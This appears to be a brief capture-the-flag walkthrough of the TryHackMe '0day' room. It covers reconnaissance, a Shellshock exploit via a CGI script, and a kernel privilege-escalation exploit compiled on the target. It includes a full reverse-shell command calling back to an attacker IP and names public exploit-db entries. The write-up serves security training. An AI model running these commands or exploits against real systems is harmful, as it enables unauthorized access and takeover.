https://tryhackme.com/room/0day Exploit Ubuntu, like a turtle in a hurricane.
Notes
nmap scans give us 22 and 80
exploring the site with gobuster we find a RSA Private key in /backup/ but this seems to be a rabbit hole….
running nikto on the site we get that the site appears vulnerable to checllshock CVE-2014-6278
this exploit works by abusing a vulnerability that exists becuause Bash is operating as a parser for CHI scripts on web servers and the way it handles specifically-formatted enviroment variables, namely explorted shell functions.
using the exploit 34766 we can take advantage of this.
php 34766.php -u http://0day.thm/cgi-bin/test.cgi -c "sh -i >& /dev/tcp/10.2.3.64/6669 0>&1"
And we can see we get a shell from the target and capture user.txt.
Privesc
uname -awe see the system is running ubuntu 3.13.searchsploit -m 37292to copy the vulnerability to the directory we are in. I was having trouble compiling with gcc on the target so we much usedos2unix 37292.cbefore sending in order to compile correctly.
now when trying to compile we get an error gcc: error trying to exec 'cc1': execvp: No such file or directory. Looks like its unable to find cc1. cc1 is the program responsible for converting C code into assembler. To fix we can fix our PATH. export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin Running the compiler again we can then execute our exploit. Which then we can pickup the last root.txt flag.